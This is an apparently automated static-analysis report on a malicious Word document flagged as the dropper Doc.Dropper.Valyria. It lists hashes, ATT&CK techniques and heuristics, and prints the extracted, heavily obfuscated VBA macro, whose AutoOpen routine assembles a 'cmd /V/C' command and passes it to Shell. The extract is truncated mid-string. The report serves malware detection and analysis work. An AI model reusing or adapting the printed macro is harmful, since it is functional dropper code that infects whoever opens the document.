Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dd18e1bb7445d8ac…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 104.6 KB
Created: 2018-08-10 09:29:00
Authoring application: Microsoft Office Word
First seen: 2018-08-26

MD5: 6e9e2ffc9cf2dd63461efc44b0408121
SHA-1: ccf6138754828550be112d74eb0fa853ea9b4527
SHA-256: dd18e1bb7445d8ac246d5d56277c30d34a28a39c072f439d6921b95fb97d7cc2

Risk Score: 142

Malware Insights

MITRE ATT&CK
  T1059.005  Command and Scripting Interpreter: Visual Basic
  T1566.001  Phishing: Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro with an AutoOpen subroutine. The macro attempts to construct and execute a command using heavily obfuscated string concatenation, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Valyria-6666972-0' further supports its dropper functionality.

Heuristics (5)

  • [critical] CLAMAV_DETECTION: ClamAV: Doc.Dropper.Valyria-6666972-0
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6666972-0
  • [medium] OLE_VBA_MACROS: VBA macros detected (1 related finding)
    Document contains VBA macro code
  • [high] OLE_VBA_AUTOOPEN: AutoOpen macro
    The VBA project contains an AutoOpen subroutine, which runs automatically when the document is opened.
  • [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11578 bytes
SHA-256: fe0bf169871a6e322def0afaa3ce4c99f2c29ea240bd19a77a2e5ac2d8a5553d

Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "CNqWBCqCWY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName Oct(trYjk)
   TypeName Sgn(tDUZQ)
   TypeName 329335345
   TypeName 3746
   TypeName 473682163
   TypeName MoVwcN
Shell@ KeyString(vbKeyC) + zbCAiJj + fEoqCElO + poJvaFp + kUzJpMrDu + DPSrozWXnkF + zXbbXYvE + mrtdLlr + HoLrjMjT + vGwDommVncE + jfWdsY + YzljE + PvvUsTI + kLBYFOMCBQn, 288190133 - 288190133
   TypeName ChrW(vUQknj)
   TypeName vbYIQ
End Sub


Attribute VB_Name = "WJlciYmjonjHl"
Function poJvaFp()
On Error Resume Next
TypeName iwEwJT
   TypeName tznkf
oHusoELkua = "m" + "d " + "/V/" + "C" + CStr(Chr(rzaVzVw + OaUzzWl + 34 + QwEqDBI + BawuTvBqzN)) + "s" + "et" + " ? "
TypeName 339338541
   TypeName Tan(zJPOb * wRWiuF)
ElXrlYwpAB = "  " + " =z" + "AG" + "AbC" + "Jtm" + "hRq" + "IQh" + "Vq" + "d(" + "pW" + "c=;"
TypeName Sqr(97097 / WInbzR * pXjWE * iQrTPk)
   TypeName ChrW(294394521)
   TypeName Round(95)
icVvIOiuzjJ = "." + "Nla" + "ui" + "v" + "x+3" + ":0P" + "'o7" + "e" + "6@s" + "}" + "ryw" + ",9" + "n-g"
TypeName Sgn(rSIhD + lZwOwP)
   TypeName ChrB(131450292)
rkPqGFXr = "k" + "f\" + ")S" + "F" + "$" + " {" + "8Dj" + "/" + "&" + "&f" + "o" + "r"
TypeName 7404
   TypeName Hex(aquasl - SCmzvD)
mnRwoFACvWj = " %" + "N " + "i" + "n (" + "1" + "9" + ";3" + "8;" + "47" + ";" + "40;" + "45;"
TypeName Rnd(3)
   TypeName Atn(81954 + kiJolu)
   TypeName CLng(95452 / RlBDM - 96160 - HGBXa)
UArHFOB = "4" + "3;" + "1" + "4;" + "4" + "0;" + "26"
TypeName 27433834
   TypeName 72
EkLok = ";2" + "6" + ";6" + "0;" + "59" + ";" + "57;" + "2;" + "6" + ";2"
TypeName Round(ZjEGUL * ScDqL * 57447 - QFYzM)
   TypeName Cos(duzSYA - mYwpw * 98481 - mUCQwZ)
   TypeName wIcTNl
mzVbQzJaJn = "2;" + "5" + "0;" + "4" + "0" + ";4" + "7" + ";5"
TypeName Atn(nlokZ)
   TypeName 342
   TypeName Rpkzq
VQYmEf = "1;" + "38" + ";4;" + "64" + ";" + "40" + ";21"
poJvaFp = oHusoELkua + ElXrlYwpAB + icVvIOiuzjJ + rkPqGFXr + mnRwoFACvWj + UArHFOB + EkLok + mzVbQzJaJn + VQYmEf
   TypeName Tan(478385079)
   TypeName Fix(16818 / Cjovjn * 29453 / rXvPZl)
End Function
Function kUzJpMrDu()
On Error Resume Next
TypeName 8
   TypeName Sin(62148 + RjNbcW)
   TypeName WtiLN
vcBwskuzf = ";7;" + "60" + ";" + "25;" + "4" + "0;" + "7;2" + "4;"
TypeName Round(48953 * aYNaH * fiQVG * JPbnbn)
   TypeName CInt(iKHhB)
   TypeName Rnd(17756 + TKXMDO)
tzjTnBj = "20;" + "40" + ";4;" + "5;2" + "6;2"
TypeName Fix(25)
   TypeName 3342
SzLmD = "9;4" + "0;" + "50" + ";7;" + "2" + "3;5" + "9" + ";" + "43" + ";57" + ";2;" + "2"
TypeName ChrB(lKEPXj)
   TypeName dJMrs
   TypeName Fix(707)
zVnYMsPbt = "2;3" + "7;1" + "4;7" + ";" + "7;"
TypeName ChrW(DkzCRK)
   TypeName CByte(YbajBw)
FPjtvPIjHK = "1" + "9" + ";" + "34;" + "65;" + "65;" + "17;" + "29"
TypeName CDbl(WwCfP)
   TypeName CLng(366432344)
   TypeName Tan(wEnlwq - vwKMQ)
sKBlGjor = ";30" + ";" + "27" + ";45" + ";1" + "9;2" + "6" + ";2" + "8" + ";43" + ";24"
TypeName Log(10931 - lcooR)
   TypeName Round(RvUsEz + 70388)
   TypeName 6
cVkrELHMFU = ";21" + ";" + "3" + "8" + ";" + "8;" + "65" + ";25" + ";" + "39;" + "35" + ";4" + "2"
kUzJpMrDu = vcBwskuzf + tzjTnBj + SzLmD + zVnYMsPbt + FPjtvPIjHK + sKBlGjor + cVkrELHMFU
   TypeName Tan(730)
   TypeName Oct(LkkIj)
End Function
Function DPSrozWXnkF()
On Error Resume Next
TypeName CSng(GBGki)
   TypeName Log(viuHm)
   TypeName CDbl(sREmYK)
qnnwuF = ";" + "1" + "4;" + "7;7" + ";1" + "9" + ";34" + ";65"
TypeName 43
   TypeName Atn(HVonhL - JqmfQ)
ZfQivCZ = ";65" + ";5" + "0" + ";27" + ";4" + "3;"
TypeName wKnmmz
   TypeName Fix(YTdGc)
   TypeName dBwzjW
GmTOsrVbTHW = "40;" + "51;" + "45;" + "38" + ";1" + "7;2" + "9;5" + "0;" + "27" + ";24"
TypeName Atn(kOcPN)
   TypeName CDate(1364)
   TypeName Fix(FvvmiW - uvGGj)
rVUYIa = ";21" + ";" + "0" + ";6" + "5;2" + "0
... (truncated)